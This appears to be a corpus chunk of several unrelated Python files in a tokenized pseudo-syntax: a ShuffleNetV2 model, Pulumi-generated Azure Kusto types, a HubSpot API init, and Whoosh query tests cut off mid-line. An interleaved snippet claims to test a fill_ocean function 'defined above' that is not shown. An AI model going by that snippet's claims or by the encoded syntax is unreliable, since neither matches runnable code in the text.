cm.keys()<block_start>count=cm[cl]<if_stmt>get_verbose()<block_start>print("%s = %i"%(str(cl) count))<block_end><block_end><if_stmt>get_verbose()<block_start>print('')# empty line print('Biome obtained:')<block_end><for_stmt>cl biome_cm.keys()<block_start>count=biome_cm[cl]<if_stmt>get_verbose()<block_start>print(" %30s = %7i"%(str(cl) count))<block_end><block_end>IcecapSimulation().execute(w seed_dict['IcecapSimulation'])# makes use of temperature-map <return>w<block_end>
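A quick sanity check of the fill_ocean flood fill defined above on a toy grid. The import path worldengine.generation is an assumption about where this module lives; the function signature and behaviour are taken directly from the code above.

# Illustrative check of fill_ocean on a tiny elevation grid; the import path is assumed.
import numpy
from worldengine.generation import fill_ocean  # assumed module path for the code above

elevation = numpy.array([[0.0, 0.2, 0.9],
                         [0.1, 1.5, 0.8],
                         [0.0, 0.3, 0.2]])
ocean = fill_ocean(elevation, sea_level=0.5)
print(ocean)
# Cells at or below sea_level that connect to the map border are flagged True;
# the 1.5 peak in the centre and the 0.9/0.8 cells on the right stay False.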
<import_stmt>torch<import_stmt>torch.nn<as>nn<class_stmt>Conv_BN_ReLU(nn.Module)<block_start><def_stmt>__init__ self in_channel out_channel k_size stride=1 padding=0 groups=1 has_bn=<true> has_relu=<true> gaussian_init=<false><block_start>super(Conv_BN_ReLU self).__init__()<line_sep>self.conv=nn.Conv2d(in_channel out_channel kernel_size=k_size stride=stride padding=padding groups=groups bias=<false>)<if_stmt>gaussian_init<block_start>nn.init.normal_(self.conv.weight.data 0 0.01)<block_end><if_stmt>has_bn<block_start>self.bn=nn.BatchNorm2d(out_channel)<block_end>self.has_bn=has_bn<line_sep>self.has_relu=has_relu<if_stmt>has_relu<block_start>self.relu=nn.ReLU(inplace=<true>)<block_end><block_end><def_stmt>forward self x<block_start>x=self.conv(x)<if_stmt>self.has_bn<block_start>x=self.bn(x)<block_end><if_stmt>self.has_relu<block_start>x=self.relu(x)<block_end><return>x<block_end><block_end><class_stmt>FC(nn.Module)<block_start><def_stmt>__init__ self in_channels out_channels<block_start>super(FC self).__init__()<line_sep>self.fc=nn.Linear(in_channels out_channels)<line_sep>nn.init.normal_(self.fc.weight.data 0 0.01)<block_end><def_stmt>forward self x<block_start><return>self.fc(x)<block_end><block_end><class_stmt>ExtraLabelPredict(nn.Module)<block_start><def_stmt>__init__ self in_channels out_channels num_classes=1000<block_start>super(ExtraLabelPredict self).__init__()<line_sep>self.num_classes=num_classes<line_sep>self.maxpool=nn.MaxPool2d(kernel_size=3 stride=2 padding=1)<line_sep>self.conv=nn.Sequential(Conv_BN_ReLU(in_channels out_channels 1 1 0) Conv_BN_ReLU(out_channels out_channels 3 1 1))<line_sep>self.globalpool=nn.AdaptiveAvgPool2d(output_size=1)<line_sep>self.fc=nn.Linear(out_channels num_classes)<block_end><def_stmt>forward self inputs<block_start>inputs=self.maxpool(inputs)<line_sep>inputs=self.conv(inputs)<line_sep>inputs=self.globalpool(inputs)<line_sep>inputs=inputs.view(inputs.size(0) -1)<line_sep>inputs=self.fc(inputs)<line_sep><return>inputs<block_end><block_end><class_stmt>ShuffleV2Block(nn.Module)<block_start><def_stmt>__init__ self in_channels out_channels mid_channels stride groups has_proj=<false> has_se=<false><block_start>super(ShuffleV2Block self).__init__()<line_sep>self.stride=stride<assert_stmt>stride<in>[1 2]<line_sep>self.has_proj=has_proj<line_sep>self.has_se=has_se<line_sep>self.relu=nn.ReLU(inplace=<true>)<if_stmt>has_proj<block_start>self.proj=Conv_BN_ReLU(in_channels out_channels-mid_channels k_size=3 stride=stride padding=1 has_bn=<true> has_relu=<true>)<block_end>self.branch_main=nn.Sequential(Conv_BN_ReLU(in_channels out_channels k_size=1 stride=1 padding=0 has_bn=<true> has_relu=<true>) Conv_BN_ReLU(out_channels out_channels k_size=3 stride=stride padding=1 groups=groups has_bn=<true> has_relu=<true>) Conv_BN_ReLU(out_channels out_channels k_size=3 stride=1 padding=1 groups=out_channels has_bn=<true> has_relu=<false>) Conv_BN_ReLU(out_channels mid_channels k_size=1 stride=1 padding=0 has_bn=<true> has_relu=<false>) )<if_stmt>has_se<block_start>self.se_globalpool=nn.AdaptiveAvgPool2d(output_size=1)<line_sep>self.se_fc1=FC(mid_channels mid_channels<floordiv>4)<line_sep>self.se_fc2=FC(mid_channels<floordiv>4 mid_channels)<line_sep>se_block=[self.se_fc1 nn.ReLU(inplace=<true>) self.se_fc2 nn.Sigmoid() ]<line_sep>self.se_block=nn.Sequential(*se_block)<block_end><block_end><def_stmt>forward self old_x<block_start><if_stmt>self.has_proj<block_start>proj,x=old_x 
old_x<block_end><else_stmt><block_start>proj,x=self.channel_shuffle(old_x)<block_end>x_proj=x<if_stmt>self.has_proj<block_start>proj=self.proj(proj)<block_end>x=self.branch_main(x)<if_stmt>self.has_se<block_start>se_scale=self.se_globalpool(x).view(x.size(0) -1)<line_sep>se_scale=self.se_block(se_scale).unsqueeze(-1).unsqueeze(-1)<line_sep>x=x<times>se_scale<block_end><if_stmt><not>self.has_proj<block_start>x=self.relu(x_proj+x)<block_end>x=torch.cat((proj x) dim=1)<line_sep><return>x<block_end><def_stmt>channel_shuffle self x<block_start>batchsize,num_channels,height,width=x.data.size()<assert_stmt>(num_channels%4<eq>0)<line_sep>x=x.reshape(batchsize<times>num_channels<floordiv>2 2 height<times>width)<line_sep>x=x.permute(1 0 2)<line_sep>x=x.reshape(2 -1 num_channels<floordiv>2 height width)<line_sep><return>x[0] x[1]<block_end><block_end><class_stmt>ShuffleNetV2(nn.Module)<block_start><def_stmt>__init__ self n_class=1000 model_size='ExLarge'<block_start>super(ShuffleNetV2 self).__init__()<line_sep>self.stage_repeats=[4 8 4]<line_sep>self.model_size=model_size<if_stmt>model_size<eq>'ExLarge'<block_start>self.pre=[2 3 4 5]<line_sep>self.stage_repeats=[8 16 36 10]<line_sep>self.outputs=[320 640 1280 2560]<line_sep>self.enable_stride=[<false> <true> <true> <true>]<block_end><else_stmt><block_start><raise>NotImplementedError<block_end>self.first_conv=nn.Sequential(Conv_BN_ReLU(3 64 k_size=3 stride=2 padding=1) Conv_BN_ReLU(64 128 k_size=3 stride=1 padding=1) Conv_BN_ReLU(128 256 k_size=3 stride=1 padding=1) )<line_sep>self.maxpool=nn.MaxPool2d(kernel_size=3 stride=2 padding=1)<line_sep>self.features=nn.ModuleList()<line_sep>input_channel=256<if_stmt>model_size<eq>'ExLarge'<block_start><for_stmt>p,s,o,es zip(self.pre self.stage_repeats self.outputs self.enable_stride)<block_start>feature=[]<for_stmt>i range(s)<block_start>prefix="{}{}".format(p str(i))<line_sep>stride=1<if><not>es<or>i<g>0<else>2<line_sep>has_proj=<false><if>i<g>0<else><true><line_sep>feature.append(ShuffleV2Block(in_channels=input_channel out_channels=o mid_channels=o<floordiv>2 stride=stride groups=16 has_proj=has_proj has_se=<true>))<line_sep>input_channel=o<floordiv>2<block_end>feature.append(Conv_BN_ReLU(o o k_size=1 stride=1 padding=0))<line_sep>input_channel=o<line_sep>feature=nn.Sequential(*feature)<line_sep>self.features.append(feature)<if_stmt>p<eq>2<block_start>self.predict_56=ExtraLabelPredict(in_channels=320 out_channels=256)<block_end><elif_stmt>p<eq>3<block_start>self.predict_28=ExtraLabelPredict(in_channels=640 out_channels=512)<block_end><elif_stmt>p<eq>4<block_start>self.predict_14=ExtraLabelPredict(in_channels=1280 out_channels=1024)<block_end><block_end><block_end>self.globalpool=nn.AvgPool2d(7)<if_stmt>self.model_size<eq>'ExLarge'<block_start>self.dropout=nn.Dropout(0.2)<block_end>self.fc=FC(2560 n_class)<line_sep>self._initialize_weights()<block_end><def_stmt>_initialize_weights self<block_start><for_stmt>name,m self.named_modules()<block_start><if_stmt>isinstance(m nn.Conv2d)<block_start><if_stmt>'first'<in>name<block_start>nn.init.normal_(m.weight 0 0.01)<block_end><else_stmt><block_start>nn.init.normal_(m.weight 0 1.0/m.weight.shape[1])<block_end><if_stmt>m.bias<is><not><none><block_start>nn.init.constant_(m.bias 0)<block_end><block_end><elif_stmt>isinstance(m nn.BatchNorm2d)<block_start>nn.init.constant_(m.weight 1)<if_stmt>m.bias<is><not><none><block_start>nn.init.constant_(m.bias 0.0001)<block_end>nn.init.constant_(m.running_mean 0)<block_end><elif_stmt>isinstance(m 
nn.BatchNorm1d)<block_start>nn.init.constant_(m.weight 1)<if_stmt>m.bias<is><not><none><block_start>nn.init.constant_(m.bias 0.0001)<block_end>nn.init.constant_(m.running_mean 0)<block_end><elif_stmt>isinstance(m nn.Linear)<block_start>nn.init.normal_(m.weight 0 0.01)<if_stmt>m.bias<is><not><none><block_start>nn.init.constant_(m.bias 0)<block_end><block_end><block_end><block_end><def_stmt>forward self x<block_start>x=self.first_conv(x)<line_sep>x=self.maxpool(x)<line_sep># 1 * 256 * 56 * 56 x=self.features[0](x)<line_sep># 1 * 320 * 56 * 56 <if_stmt>self.training<block_start>predict_56=self.predict_56(x)<block_end>x=self.features[1](x)<line_sep># 1 * 640 * 28 * 28 <if_stmt>self.training<block_start>predict_28=self.predict_28(x)<block_end>x=self.features[2](x)<line_sep># 1 * 1280 * 14 * 14 <if_stmt>self.training<block_start>predict_14=self.predict_14(x)<block_end>x=self.features[3](x)<line_sep># 1 * 2560 * 7 * 7 x=self.globalpool(x)<if_stmt>self.model_size<eq>'ExLarge'<block_start>x=self.dropout(x)<block_end>x=x.reshape(x.size(0) -1)<line_sep>x=self.fc(x)<if_stmt>self.training# Loss is scaled by 1.0, 0.7, 0.5, 0.3 <block_start><return>x predict_14 predict_28 predict_56<block_end><else_stmt><block_start><return>x<block_end><block_end><block_end><def_stmt>create_network <block_start>model=ShuffleNetV2()<line_sep><return>model<block_end><if_stmt>__name__<eq>"__main__"<block_start>create_network()<block_end>
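A standalone illustration of the channel_shuffle step used by ShuffleV2Block above. It only needs PyTorch and a toy tensor, and repeats the same reshape/permute sequence so the two returned halves can be inspected; the tensor sizes are illustrative only.

# Reproduces ShuffleV2Block.channel_shuffle on a small tensor (N=2, C=8, H=W=2).
import torch

x = torch.arange(2 * 8 * 2 * 2, dtype=torch.float32).reshape(2, 8, 2, 2)
batchsize, num_channels, height, width = x.size()
assert num_channels % 4 == 0
y = x.reshape(batchsize * num_channels // 2, 2, height * width)
y = y.permute(1, 0, 2)
y = y.reshape(2, -1, num_channels // 2, height, width)
left, right = y[0], y[1]  # two halves with interleaved channels, as returned by channel_shuffle
print(left.shape, right.shape)  # torch.Size([2, 4, 2, 2]) twice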
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** <import_stmt>warnings<import_stmt>pulumi<import_stmt>pulumi.runtime<import_from_stmt>typing Any Mapping Optional Sequence Union overload<import_from_stmt>.. _utilities<line_sep>__all__=['AttachedDatabaseConfigurationSharingArgs' 'ClusterIdentityArgs' 'ClusterOptimizedAutoScaleArgs' 'ClusterSkuArgs' 'ClusterVirtualNetworkConfigurationArgs' ]<line_sep>@pulumi.input_type<class_stmt>AttachedDatabaseConfigurationSharingArgs<block_start><def_stmt>__init__ __self__ * external_tables_to_excludes:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]=<none> external_tables_to_includes:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]=<none> materialized_views_to_excludes:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]=<none> materialized_views_to_includes:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]=<none> tables_to_excludes:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]=<none> tables_to_includes:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]=<none><block_start>""" :param pulumi.Input[Sequence[pulumi.Input[str]]] external_tables_to_excludes: List of external tables exclude from the follower database. :param pulumi.Input[Sequence[pulumi.Input[str]]] external_tables_to_includes: List of external tables to include in the follower database. :param pulumi.Input[Sequence[pulumi.Input[str]]] materialized_views_to_excludes: List of materialized views exclude from the follower database. :param pulumi.Input[Sequence[pulumi.Input[str]]] materialized_views_to_includes: List of materialized views to include in the follower database. :param pulumi.Input[Sequence[pulumi.Input[str]]] tables_to_excludes: List of tables to exclude from the follower database. :param pulumi.Input[Sequence[pulumi.Input[str]]] tables_to_includes: List of tables to include in the follower database. """<if_stmt>external_tables_to_excludes<is><not><none><block_start>pulumi.set(__self__ "external_tables_to_excludes" external_tables_to_excludes)<block_end><if_stmt>external_tables_to_includes<is><not><none><block_start>pulumi.set(__self__ "external_tables_to_includes" external_tables_to_includes)<block_end><if_stmt>materialized_views_to_excludes<is><not><none><block_start>pulumi.set(__self__ "materialized_views_to_excludes" materialized_views_to_excludes)<block_end><if_stmt>materialized_views_to_includes<is><not><none><block_start>pulumi.set(__self__ "materialized_views_to_includes" materialized_views_to_includes)<block_end><if_stmt>tables_to_excludes<is><not><none><block_start>pulumi.set(__self__ "tables_to_excludes" tables_to_excludes)<block_end><if_stmt>tables_to_includes<is><not><none><block_start>pulumi.set(__self__ "tables_to_includes" tables_to_includes)<block_end><block_end>@[email protected](name="externalTablesToExcludes")<def_stmt>external_tables_to_excludes self<arrow>Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>""" List of external tables exclude from the follower database. 
"""<line_sep><return>pulumi.get(self "external_tables_to_excludes")<block_end>@external_tables_to_excludes.setter<def_stmt>external_tables_to_excludes self value:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>pulumi.set(self "external_tables_to_excludes" value)<block_end>@[email protected](name="externalTablesToIncludes")<def_stmt>external_tables_to_includes self<arrow>Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>""" List of external tables to include in the follower database. """<line_sep><return>pulumi.get(self "external_tables_to_includes")<block_end>@external_tables_to_includes.setter<def_stmt>external_tables_to_includes self value:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>pulumi.set(self "external_tables_to_includes" value)<block_end>@[email protected](name="materializedViewsToExcludes")<def_stmt>materialized_views_to_excludes self<arrow>Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>""" List of materialized views exclude from the follower database. """<line_sep><return>pulumi.get(self "materialized_views_to_excludes")<block_end>@materialized_views_to_excludes.setter<def_stmt>materialized_views_to_excludes self value:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>pulumi.set(self "materialized_views_to_excludes" value)<block_end>@[email protected](name="materializedViewsToIncludes")<def_stmt>materialized_views_to_includes self<arrow>Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>""" List of materialized views to include in the follower database. """<line_sep><return>pulumi.get(self "materialized_views_to_includes")<block_end>@materialized_views_to_includes.setter<def_stmt>materialized_views_to_includes self value:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>pulumi.set(self "materialized_views_to_includes" value)<block_end>@[email protected](name="tablesToExcludes")<def_stmt>tables_to_excludes self<arrow>Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>""" List of tables to exclude from the follower database. """<line_sep><return>pulumi.get(self "tables_to_excludes")<block_end>@tables_to_excludes.setter<def_stmt>tables_to_excludes self value:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>pulumi.set(self "tables_to_excludes" value)<block_end>@[email protected](name="tablesToIncludes")<def_stmt>tables_to_includes self<arrow>Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>""" List of tables to include in the follower database. """<line_sep><return>pulumi.get(self "tables_to_includes")<block_end>@tables_to_includes.setter<def_stmt>tables_to_includes self value:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>pulumi.set(self "tables_to_includes" value)<block_end><block_end>@pulumi.input_type<class_stmt>ClusterIdentityArgs<block_start><def_stmt>__init__ __self__ * type:pulumi.Input[str] identity_ids:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]=<none> principal_id:Optional[pulumi.Input[str]]=<none> tenant_id:Optional[pulumi.Input[str]]=<none><block_start>""" :param pulumi.Input[str] type: Specifies the type of Managed Service Identity that is configured on this Kusto Cluster. Possible values are: `SystemAssigned`, `UserAssigned` and `SystemAssigned, UserAssigned`. :param pulumi.Input[Sequence[pulumi.Input[str]]] identity_ids: A list of IDs for User Assigned Managed Identity resources to be assigned. 
:param pulumi.Input[str] principal_id: The Principal ID associated with this System Assigned Managed Service Identity. :param pulumi.Input[str] tenant_id: The Tenant ID associated with this System Assigned Managed Service Identity. """<line_sep>pulumi.set(__self__ "type" type)<if_stmt>identity_ids<is><not><none><block_start>pulumi.set(__self__ "identity_ids" identity_ids)<block_end><if_stmt>principal_id<is><not><none><block_start>pulumi.set(__self__ "principal_id" principal_id)<block_end><if_stmt>tenant_id<is><not><none><block_start>pulumi.set(__self__ "tenant_id" tenant_id)<block_end><block_end>@[email protected]<def_stmt>type self<arrow>pulumi.Input[str]<block_start>""" Specifies the type of Managed Service Identity that is configured on this Kusto Cluster. Possible values are: `SystemAssigned`, `UserAssigned` and `SystemAssigned, UserAssigned`. """<line_sep><return>pulumi.get(self "type")<block_end>@type.setter<def_stmt>type self value:pulumi.Input[str]<block_start>pulumi.set(self "type" value)<block_end>@[email protected](name="identityIds")<def_stmt>identity_ids self<arrow>Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>""" A list of IDs for User Assigned Managed Identity resources to be assigned. """<line_sep><return>pulumi.get(self "identity_ids")<block_end>@identity_ids.setter<def_stmt>identity_ids self value:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>pulumi.set(self "identity_ids" value)<block_end>@[email protected](name="principalId")<def_stmt>principal_id self<arrow>Optional[pulumi.Input[str]]<block_start>""" The Principal ID associated with this System Assigned Managed Service Identity. """<line_sep><return>pulumi.get(self "principal_id")<block_end>@principal_id.setter<def_stmt>principal_id self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "principal_id" value)<block_end>@[email protected](name="tenantId")<def_stmt>tenant_id self<arrow>Optional[pulumi.Input[str]]<block_start>""" The Tenant ID associated with this System Assigned Managed Service Identity. """<line_sep><return>pulumi.get(self "tenant_id")<block_end>@tenant_id.setter<def_stmt>tenant_id self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "tenant_id" value)<block_end><block_end>@pulumi.input_type<class_stmt>ClusterOptimizedAutoScaleArgs<block_start><def_stmt>__init__ __self__ * maximum_instances:pulumi.Input[int] minimum_instances:pulumi.Input[int]<block_start>""" :param pulumi.Input[int] maximum_instances: The maximum number of allowed instances. Must between `0` and `1000`. :param pulumi.Input[int] minimum_instances: The minimum number of allowed instances. Must between `0` and `1000`. """<line_sep>pulumi.set(__self__ "maximum_instances" maximum_instances)<line_sep>pulumi.set(__self__ "minimum_instances" minimum_instances)<block_end>@[email protected](name="maximumInstances")<def_stmt>maximum_instances self<arrow>pulumi.Input[int]<block_start>""" The maximum number of allowed instances. Must between `0` and `1000`. """<line_sep><return>pulumi.get(self "maximum_instances")<block_end>@maximum_instances.setter<def_stmt>maximum_instances self value:pulumi.Input[int]<block_start>pulumi.set(self "maximum_instances" value)<block_end>@[email protected](name="minimumInstances")<def_stmt>minimum_instances self<arrow>pulumi.Input[int]<block_start>""" The minimum number of allowed instances. Must between `0` and `1000`. 
"""<line_sep><return>pulumi.get(self "minimum_instances")<block_end>@minimum_instances.setter<def_stmt>minimum_instances self value:pulumi.Input[int]<block_start>pulumi.set(self "minimum_instances" value)<block_end><block_end>@pulumi.input_type<class_stmt>ClusterSkuArgs<block_start><def_stmt>__init__ __self__ * name:pulumi.Input[str] capacity:Optional[pulumi.Input[int]]=<none><block_start>""" :param pulumi.Input[str] name: The name of the SKU. Valid values are: `Dev(No SLA)_Standard_D11_v2`, `Dev(No SLA)_Standard_E2a_v4`, `Standard_D11_v2`, `Standard_D12_v2`, `Standard_D13_v2`, `Standard_D14_v2`, `Standard_DS13_v2+1TB_PS`, `Standard_DS13_v2+2TB_PS`, `Standard_DS14_v2+3TB_PS`, `Standard_DS14_v2+4TB_PS`, `Standard_E16as_v4+3TB_PS`, `Standard_E16as_v4+4TB_PS`, `Standard_E16a_v4`, `Standard_E2a_v4`, `Standard_E4a_v4`, `Standard_E64i_v3`, `Standard_E8as_v4+1TB_PS`, `Standard_E8as_v4+2TB_PS`, `Standard_E8a_v4`, `Standard_L16s`, `Standard_L4s`, `Standard_L8s`, `Standard_L16s_v2` and `Standard_L8s_v2`. :param pulumi.Input[int] capacity: Specifies the node count for the cluster. Boundaries depend on the sku name. """<line_sep>pulumi.set(__self__ "name" name)<if_stmt>capacity<is><not><none><block_start>pulumi.set(__self__ "capacity" capacity)<block_end><block_end>@[email protected]<def_stmt>name self<arrow>pulumi.Input[str]<block_start>""" The name of the SKU. Valid values are: `Dev(No SLA)_Standard_D11_v2`, `Dev(No SLA)_Standard_E2a_v4`, `Standard_D11_v2`, `Standard_D12_v2`, `Standard_D13_v2`, `Standard_D14_v2`, `Standard_DS13_v2+1TB_PS`, `Standard_DS13_v2+2TB_PS`, `Standard_DS14_v2+3TB_PS`, `Standard_DS14_v2+4TB_PS`, `Standard_E16as_v4+3TB_PS`, `Standard_E16as_v4+4TB_PS`, `Standard_E16a_v4`, `Standard_E2a_v4`, `Standard_E4a_v4`, `Standard_E64i_v3`, `Standard_E8as_v4+1TB_PS`, `Standard_E8as_v4+2TB_PS`, `Standard_E8a_v4`, `Standard_L16s`, `Standard_L4s`, `Standard_L8s`, `Standard_L16s_v2` and `Standard_L8s_v2`. """<line_sep><return>pulumi.get(self "name")<block_end>@name.setter<def_stmt>name self value:pulumi.Input[str]<block_start>pulumi.set(self "name" value)<block_end>@[email protected]<def_stmt>capacity self<arrow>Optional[pulumi.Input[int]]<block_start>""" Specifies the node count for the cluster. Boundaries depend on the sku name. """<line_sep><return>pulumi.get(self "capacity")<block_end>@capacity.setter<def_stmt>capacity self value:Optional[pulumi.Input[int]]<block_start>pulumi.set(self "capacity" value)<block_end><block_end>@pulumi.input_type<class_stmt>ClusterVirtualNetworkConfigurationArgs<block_start><def_stmt>__init__ __self__ * data_management_public_ip_id:pulumi.Input[str] engine_public_ip_id:pulumi.Input[str] subnet_id:pulumi.Input[str]<block_start>""" :param pulumi.Input[str] data_management_public_ip_id: Data management's service public IP address resource id. :param pulumi.Input[str] engine_public_ip_id: Engine service's public IP address resource id. :param pulumi.Input[str] subnet_id: The subnet resource id. """<line_sep>pulumi.set(__self__ "data_management_public_ip_id" data_management_public_ip_id)<line_sep>pulumi.set(__self__ "engine_public_ip_id" engine_public_ip_id)<line_sep>pulumi.set(__self__ "subnet_id" subnet_id)<block_end>@[email protected](name="dataManagementPublicIpId")<def_stmt>data_management_public_ip_id self<arrow>pulumi.Input[str]<block_start>""" Data management's service public IP address resource id. 
"""<line_sep><return>pulumi.get(self "data_management_public_ip_id")<block_end>@data_management_public_ip_id.setter<def_stmt>data_management_public_ip_id self value:pulumi.Input[str]<block_start>pulumi.set(self "data_management_public_ip_id" value)<block_end>@[email protected](name="enginePublicIpId")<def_stmt>engine_public_ip_id self<arrow>pulumi.Input[str]<block_start>""" Engine service's public IP address resource id. """<line_sep><return>pulumi.get(self "engine_public_ip_id")<block_end>@engine_public_ip_id.setter<def_stmt>engine_public_ip_id self value:pulumi.Input[str]<block_start>pulumi.set(self "engine_public_ip_id" value)<block_end>@[email protected](name="subnetId")<def_stmt>subnet_id self<arrow>pulumi.Input[str]<block_start>""" The subnet resource id. """<line_sep><return>pulumi.get(self "subnet_id")<block_end>@subnet_id.setter<def_stmt>subnet_id self value:pulumi.Input[str]<block_start>pulumi.set(self "subnet_id" value)<block_end><block_end>
<import_from_future_stmt> absolute_import<line_sep># flake8: noqa # import apis into api package <import_from_stmt>hubspot.crm.quotes.api.associations_api AssociationsApi<import_from_stmt>hubspot.crm.quotes.api.basic_api BasicApi<import_from_stmt>hubspot.crm.quotes.api.batch_api BatchApi<import_from_stmt>hubspot.crm.quotes.api.search_api SearchApi<line_sep>
<import_from_future_stmt> with_statement<import_stmt>copy<import_stmt>pytest<import_from_stmt>whoosh fields qparser query<import_from_stmt>whoosh.compat b u<import_from_stmt>whoosh.filedb.filestore RamStorage<import_from_stmt>whoosh.qparser QueryParser<import_from_stmt>whoosh.query And<import_from_stmt>whoosh.query AndMaybe<import_from_stmt>whoosh.query ConstantScoreQuery<import_from_stmt>whoosh.query DateRange<import_from_stmt>whoosh.query DisjunctionMax<import_from_stmt>whoosh.query Every<import_from_stmt>whoosh.query FuzzyTerm<import_from_stmt>whoosh.query Not<import_from_stmt>whoosh.query NullQuery<import_from_stmt>whoosh.query NumericRange<import_from_stmt>whoosh.query Or<import_from_stmt>whoosh.query Phrase<import_from_stmt>whoosh.query Prefix<import_from_stmt>whoosh.query Require<import_from_stmt>whoosh.query Term<import_from_stmt>whoosh.query TermRange<import_from_stmt>whoosh.query Variations<import_from_stmt>whoosh.query Wildcard<import_from_stmt>whoosh.query.spans SpanContains<import_from_stmt>whoosh.query.spans SpanFirst<import_from_stmt>whoosh.query.spans SpanNear<import_from_stmt>whoosh.query.spans SpanNot<import_from_stmt>whoosh.query.spans SpanOr<import_from_stmt>whoosh.util.testing TempIndex<def_stmt>test_all_terms <block_start>q=QueryParser("a" <none>).parse(u('hello b:there c:"my friend"'))<line_sep>ts=q.all_terms(phrases=<false>)<assert_stmt>sorted(ts)<eq>[("a" "hello") ("b" "there")]<line_sep>ts=q.all_terms(phrases=<true>)<assert_stmt>sorted(ts)<eq>[("a" "hello") ("b" "there") ("c" "friend") ("c" "my")]<block_end><def_stmt>test_existing_terms <block_start>s=fields.Schema(key=fields.ID value=fields.TEXT)<line_sep>ix=RamStorage().create_index(s)<line_sep>w=ix.writer()<line_sep>w.add_document(key=u("a") value=u("alfa bravo charlie delta echo"))<line_sep>w.add_document(key=u("b") value=u("foxtrot golf hotel india juliet"))<line_sep>w.commit()<line_sep>r=ix.reader()<line_sep>q=QueryParser("value" <none>).parse(u('alfa hotel tango "sierra bravo"'))<line_sep>ts=q.existing_terms(r phrases=<false>)<assert_stmt>sorted(ts)<eq>[("value" b("alfa")) ("value" b("hotel"))]<line_sep>ts=q.existing_terms(r)<assert_stmt>sorted(ts)<eq>[("value" b("alfa")) ("value" b("bravo")) ("value" b("hotel"))]<block_end><def_stmt>test_wildcard_existing_terms <block_start>s=fields.Schema(key=fields.ID value=fields.TEXT)<line_sep>ix=RamStorage().create_index(s)<line_sep>w=ix.writer()<line_sep>w.add_document(key=u("a") value=u("alfa bravo bear charlie delta"))<line_sep>w.add_document(key=u("a") value=u("boggle echo render rendering renders"))<line_sep>w.commit()<line_sep>r=ix.reader()<line_sep>qp=QueryParser("value" ix.schema)<def_stmt>words terms<block_start>z=[]<for_stmt>t terms<block_start><assert_stmt>t[0]<eq>"value"<line_sep>z.append(t[1])<block_end><return>b(" ").join(sorted(z))<block_end>q=qp.parse(u("b*"))<line_sep>ts=q.existing_terms(r)<assert_stmt>ts<eq>set()<line_sep>ts=q.existing_terms(r expand=<true>)<assert_stmt>words(ts)<eq>b("bear boggle bravo")<line_sep>q=qp.parse(u("[a TO f]"))<line_sep>ts=q.existing_terms(r)<assert_stmt>ts<eq>set()<line_sep>ts=q.existing_terms(r expand=<true>)<assert_stmt>words(ts)<eq>b("alfa bear boggle bravo charlie delta echo")<line_sep>q=query.Variations("value" "render")<line_sep>ts=q.existing_terms(r expand=<false>)<assert_stmt>ts<eq>set([("value" b("render"))])<line_sep>ts=q.existing_terms(r expand=<true>)<assert_stmt>words(ts)<eq>b("render rendering renders")<block_end><def_stmt>test_replace <block_start>q=And([Or([Term("a" "b") Term("b" "c")] boost=1.2) 
Variations("a" "b" boost=2.0)])<line_sep>q=q.replace("a" "b" "BB")<assert_stmt>q<eq>And([Or([Term("a" "BB") Term("b" "c")] boost=1.2) Variations("a" "BB" boost=2.0)])<block_end><def_stmt>test_apply <block_start><def_stmt>visit q<block_start><if_stmt>isinstance(q (Term Variations FuzzyTerm))<block_start>q.text=q.text.upper()<line_sep><return>q<block_end><return>q.apply(visit)<block_end>before=And([Not(Term("a" u("b"))) Variations("a" u("c")) Not(FuzzyTerm("a" u("d")))])<line_sep>after=visit(before)<assert_stmt>after<eq>And([Not(Term("a" u("B"))) Variations("a" u("C")) Not(FuzzyTerm("a" u("D")))])<def_stmt>term2var q<block_start><if_stmt>isinstance(q Term)<block_start><return>Variations(q.fieldname q.text)<block_end><else_stmt><block_start><return>q.apply(term2var)<block_end><block_end>q=And([Term("f" "alfa") Or([Term("f" "bravo") Not(Term("f" "charlie"))])])<line_sep>q=term2var(q)<assert_stmt>q<eq>And([Variations('f' 'alfa') Or([Variations('f' 'bravo') Not(Variations('f' 'charlie'))])])<block_end><def_stmt>test_accept <block_start><def_stmt>boost_phrases q<block_start><if_stmt>isinstance(q Phrase)<block_start>q.boost<augmul>2.0<block_end><return>q<block_end>before=And([Term("a" u("b")) Or([Term("c" u("d")) Phrase("a" [u("e") u("f")])]) Phrase("a" [u("g") u("h")] boost=0.25)])<line_sep>after=before.accept(boost_phrases)<assert_stmt>after<eq>And([Term("a" u("b")) Or([Term("c" u("d")) Phrase("a" [u("e") u("f")] boost=2.0)]) Phrase("a" [u("g") u("h")] boost=0.5)])<line_sep>before=Phrase("a" [u("b") u("c")] boost=2.5)<line_sep>after=before.accept(boost_phrases)<assert_stmt>after<eq>Phrase("a" [u("b") u("c")] boost=5.0)<block_end><def_stmt>test_simplify <block_start>s=fields.Schema(k=fields.ID v=fields.TEXT)<line_sep>ix=RamStorage().create_index(s)<line_sep>w=ix.writer()<line_sep>w.add_document(k=u("1") v=u("aardvark apple allan alfa bear bee"))<line_sep>w.add_document(k=u("2") v=u("brie glue geewhiz goop julia"))<line_sep>w.commit()<line_sep>r=ix.reader()<line_sep>q1=And([Prefix("v" "b" boost=2.0) Term("v" 